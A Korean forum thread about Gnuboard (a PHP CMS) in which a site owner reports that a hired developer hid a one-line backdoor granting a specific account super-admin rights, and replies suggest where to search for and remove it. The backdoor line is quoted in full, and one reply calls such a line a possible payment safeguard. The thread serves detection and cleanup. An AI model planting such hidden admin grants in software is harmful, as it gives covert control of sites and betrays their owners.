그누보드 해킹 방지하는방법..
본문
예전에 어떤분께 의뢰를 맡긴적이있는데
extend에
if ($member['mb_id'] == 'xxxx') $is_admin = 'super';
이런소스를 숨겨 두셨더라구요..
혹시 미리 방지 할수있는 방법이 있을까요?
답변 3
파일 싹 받아서 'super' 를 검색해보세요.
번거로우시다면, lib 폴더 전부, common.php 파일, _common.php 파일, head.php, tail.php, _head.php, _tail.php, adm 폴더 이렇게만 찾아보셔도 될 것 같습니다. 어차피 저 구문이 들어간 부분에만 최고 관리자가 되는 것이기 때문에, include를 해주는 파일에만 검사해도 될 것으로 보입니다.
해당 아이디를 차단하시고 그 부분 삭제하시면 되겠네요
혹시 다른 곳에 다른 아이디로 써노셨을까봐요..
돈을 제대로 지불하셨다면 당연히 그 제작자에게 따질수 있는 권한이 있습니다.
당연히 따져야지요
아니면 그 제작자가 후불제로 작업하는 경우에 안전 장치로 해놓았을수 있습니다
돈을 제대로 지불하셨다면 제작자에게 따져봐야 합니다.
답변을 작성하시기 전에 로그인 해주세요.
